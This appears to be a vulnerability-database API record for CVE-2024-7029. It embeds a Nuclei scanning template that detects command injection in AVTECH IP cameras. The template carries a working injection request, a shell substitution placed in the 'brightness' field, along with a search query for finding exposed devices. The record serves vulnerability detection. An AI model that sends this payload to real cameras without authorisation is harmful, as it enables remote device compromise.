{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-7029/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-7029/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-7029/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-7029/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-7029/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-7029"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-7029"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-7029.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-7029\n\ninfo:\n  name: AVTECH IP Camera - Command Injection\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    The endpoint `/cgi-bin/supervisor/Factory.cgi` is vulnerable to command injection via the `action` parameter, allowing remote code execution.\n  impact: |\n    Authenticated attackers can execute arbitrary commands on the AVTECH IP camera system, achieving complete device compromise and potentially using it as a pivot point for network attacks.\n  remediation: |\n    Apply security patches from AVTECH or implement network segmentation and access controls to restrict access to the vulnerable endpoint.\n  reference:\n    - https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt\n    - https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07\n    - https://github.com/fkie-cad/nvd-json-data-feeds\n    - https://github.com/nomi-sec/PoC-in-GitHub\n    - https://github.com/Ostorlab/KEV\n    - https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT/blob/main/CVE-2024-7029.py\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2024-7029\n    cwe-id: CWE-77\n    epss-score: 0.38998\n    epss-percentile: 0.98528\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"AVTECH Software\"\n  tags: cve,cve2024,avtech,rce,intrusive,vkev,vuln\n\nvariables:\n  string: \"{{randstr}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=white_led&brightness=$(echo%20{{string}}+2>&1)\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{string}}\"\n\n      - type: word\n        negative: true\n        part: body\n        words:\n          - \"echo%20{{string}}\"\n          - \"echo {{string}}\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/plain\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022060744124c7065f80e1cdc36251a3ccb4ef68688f421f0fab8bd6bcfde0f0ff29022100e0fdeb20a3f5dcb6222d9823704ab18520218255a78e8c8ccbb0ca59a2937803:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-7029"
}